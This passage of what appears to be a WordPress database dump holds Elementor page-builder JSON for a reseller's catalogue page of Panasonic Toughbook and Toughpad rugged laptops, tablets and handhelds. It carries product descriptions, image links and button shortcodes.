T1\",\"header_size\":\"h4\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"284c9f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-t1_image1-1_ss_1.jpg\",\"id\":2601}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8fca4ad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae\\u00a0T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users won\\u2019t miss a beat with its great battery life, glove and rain touch enabled 5\\\" screen, 5 foot drop rating and IP66 and IP68 certification.\\u00a0 The TOUGHBOOK\\u00a0T1 is ready to be used by satisfied end users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c1dba18\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":53},\"elements\":[{\"id\":\"ed06566\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK N1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"57df093\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-n1_mk2_android_image_2_1.jpg\",\"id\":2604}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"380b880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae N1 \\u2014 a powerful, slim and fully rugged handheld. It\\u2019s the all-in-one tool you\\u2019ve been waiting for, and it\\u2019s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you won\\u2019t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Android\\u2122 operating system,\\u00a0giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers\\/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, don\\u2019t worry \\u2014 it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6aba493\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3256f2d\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-X1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b370c19\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/236380_F1X1_Hero.png\",\"id\":2603}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1efa495\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The TOUGHPAD\\u00ae FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.\\u00a0Thirty minutes of under five feet of water rugged.\\u00a0Ten foot drops onto solid concrete rugged. Built-in heater for -4\\u00b0 F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"645131d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5ec8bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cea0ebe\",\"elType\":\"widget\",\"settings\":{\"title\":\"Tablets\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c92f938\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"bb0c96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e27fe8\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK L1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f6ee69c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-l1_right_ss.jpg\",\"id\":2609}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"636c2cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Android\\u2122 OS based\\u00a07\\\" tablet that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used\\u00a0in the enterprise to collect information from workers in retail stores,\\u00a0warehouses field service, transportation and delivery or many other\\u00a0environments where work must occur belies its mild looking exterior.\\u00a0The TOUGHBOOK L1 has a quad-core processor and optional straight-shooting\\u00a0barcode reader from portrait to landscape, use a stylus pen or connect\\u00a0to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.\\u00a0This tablet\\u2019s users won\\u2019t miss a beat with its great battery life, glove and\\u00a0rain touch enabled 7\\\" screen, 5 foot drop rating and IP65 and IP67\\u00a0certification. The TOUGHBOOK L1 is ready to be used by satisfied end\\u00a0users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d16c223\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":35},\"elements\":[{\"id\":\"ba5591e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-M1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca8b0be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-m1_image_01_new_win10.jpg\",\"id\":2610}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"30fc1f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic FZ-M1 is the fully rugged Windows\\u00ae tablet, built to\\u00a0enable mission-critical mobile worker productivity without compromise. Powered\\u00a0by Windows\\u00ae 10 Pro, the FZ-M1 features a long life, user-replaceable\\u00a0battery and a daylight-readable, high-sensitivity multi-touch display for use\\u00a0with heavy gloves. With the broadest range of configuration options available in\\u00a0its class, the highly customizable FZ-M1 is the ideal tool for today\\u2019s\\u00a0mobile workforce. In addition to the highly configurable options, added models\\u00a0of Thermal Camera, Real Sense Camera, RTK\\/GPS, as well as several more.\\u00a0Allows the FZ-M1 to be the most comprehensive 7\\\" tablet in the market.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ddfa1b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4648e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-G1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca5913e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-g1mk5_us_image02_ss.jpg\",\"id\":2611}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a32d55e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experience\\u00a0while providing crucial port connectivity and feature-rich options in a compact\\u00a0size. Designed for highly mobile field workers, it\\u2019s the thinnest and lightest\\u00a0fully rugged 10.1\\\" tablet running Windows 10 Pro 64-Bit. Powered by an\\u00a0Intel\\u00ae Core\\u2122 i5 vPro\\u2122 processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobile\\u00a0computing. Add to that an HD daylight-readable 10-point gloved multi touch +\\u00a0waterproof digitizer pen, and it becomes an essential tool for field workers.\\u00a0With added Thermal camera and IR camera options.\\u00a0 Can also support \\\"Windows Hello\\\" for enhanced security.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d7ecd2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ae2a70d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b56dd64\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-A2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb7e441\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_fz_a2_hero_front-1.png\",\"id\":2612}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"705b4b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>With the Android 6.0 (Marshmallow) operating system and Intel\\u00ae x5-Z8550 processor, the Panasonic TOUGHPAD\\u00ae A2 10.1-inch fully rugged Android\\u2122 tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPAD\\u00a0FZ-A2 tablet is up to the task.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34adf46\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":51},\"elements\":[{\"id\":\"46a580a\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-B2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3fc0690\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/prod-jtb2-hero.png\",\"id\":2613}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0fedb48\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The rugged, 7-inch Panasonic TOUGHPAD\\u00ae FZ-B2, now powered by Android\\u2122 6.0.1 (Marshmallow) and the latest Intel\\u00ae AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options \\u2013 at a price within reach of any business \\u2013 the TOUGHPAD\\u00a0FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPAD\\u00a0FZ-B2 is built for long-lasting durability where others fail.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3733,2690,'_elementor_version','0.4'),(3736,2691,'_elementor_edit_mode','builder'),(3737,2691,'_elementor_template_type','post'),(3738,2691,'_wp_page_template','template-fullwidth.php'),(3739,2691,'_elementor_data','[{\"id\":\"292e187\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"19fa744\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9d3051\",\"elType\":\"widget\",\"settings\":{\"title\":\"Computer Toughbook\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18d10b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"330ac40\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"52bc26e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 33\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e3edb98\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_33_hero.png\",\"id\":2594}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2aad3d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\"><strong>PRODUCT<\\/strong> DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 33 is the first fully-rugged 2-in-1 of its kind\\u2014redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\\\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboards\\u2014TOUGHBOOK 33 is built for maximum mobility.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6e91208\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":52},\"elements\":[{\"id\":\"be86921\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 31\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5da701a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb31_win10.jpg\",\"id\":2593}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4dfcd25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<header class=\\\"product-details__header\\\"><\\/header><div class=\\\"buttons-bar product-details__dealers\\\"><h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><\\/div><div class=\\\"product-details__description\\\"><div class=\\\"field field--name-field-product-details field--type-text-long field--label-above\\\"><div class=\\\"field__item\\\"><p>Panasonic presents the TOUGHBOOK\\u00ae 31, the reliable laptop offering\\u00a0the world\\u2019s most rugged design. With drop-shock protection and a\\u00a0MIL-STD-810G certification, it\\u2019s the undisputed leader in the fully\\u00a0rugged category. Its Intel\\u00ae Core\\u2122 i5 processor packs a punch and it delivers amazing battery life\\u201419.5 hours, or 29 hours with the optional media bay\\u00a02nd battery. Combine six generations of delivering rugged performance\\u00a0plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div><\\/div><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bb47d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9db1fee\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 54\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"15ce475\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_54_hero.png\",\"id\":2595}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6a00781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>A semi-rugged 14\\u201d laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen Intel\\u00ae processors running Windows\\u00ae 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc7e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f01603d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"75026de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5649b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1a9a32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":51},\"elements\":[{\"id\":\"c925bd0\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 20\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b619a0\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/20mk2_laptop_right_angle_detached-1.jpg\",\"id\":2596}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9e46753\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\\\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5c9e08f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"830958b\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-Q2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4d72a50\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/toughpad-q2-hero.png\",\"id\":2597}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f07ddc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>From the industry leader in reliability comes the Panasonic TOUGHPAD\\u00ae FZ-Q2 12.5-inch 2-in-1 Windows\\u00ae 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"816152c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"488a087\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fb85606\",\"elType\":\"widget\",\"settings\":{\"title\":\"Handhelds\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"68ee5f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"32bd399\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b342b76\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK T1\",\"header_size\":\"h4\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"284c9f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-t1_image1-1_ss_1.jpg\",\"id\":2601}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8fca4ad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae\\u00a0T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users won\\u2019t miss a beat with its great battery life, glove and rain touch enabled 5\\\" screen, 5 foot drop rating and IP66 and IP68 certification.\\u00a0 The TOUGHBOOK\\u00a0T1 is ready to be used by satisfied end users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c1dba18\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":53},\"elements\":[{\"id\":\"ed06566\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK N1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"57df093\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-n1_mk2_android_image_2_1.jpg\",\"id\":2604}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"380b880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae N1 \\u2014 a powerful, slim and fully rugged handheld. It\\u2019s the all-in-one tool you\\u2019ve been waiting for, and it\\u2019s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you won\\u2019t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Android\\u2122 operating system,\\u00a0giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers\\/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, don\\u2019t worry \\u2014 it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6aba493\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3256f2d\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-X1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b370c19\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/236380_F1X1_Hero.png\",\"id\":2603}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1efa495\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The TOUGHPAD\\u00ae FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.\\u00a0Thirty minutes of under five feet of water rugged.\\u00a0Ten foot drops onto solid concrete rugged. Built-in heater for -4\\u00b0 F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"645131d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5ec8bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cea0ebe\",\"elType\":\"widget\",\"settings\":{\"title\":\"Tablets\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c92f938\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"bb0c96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e27fe8\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 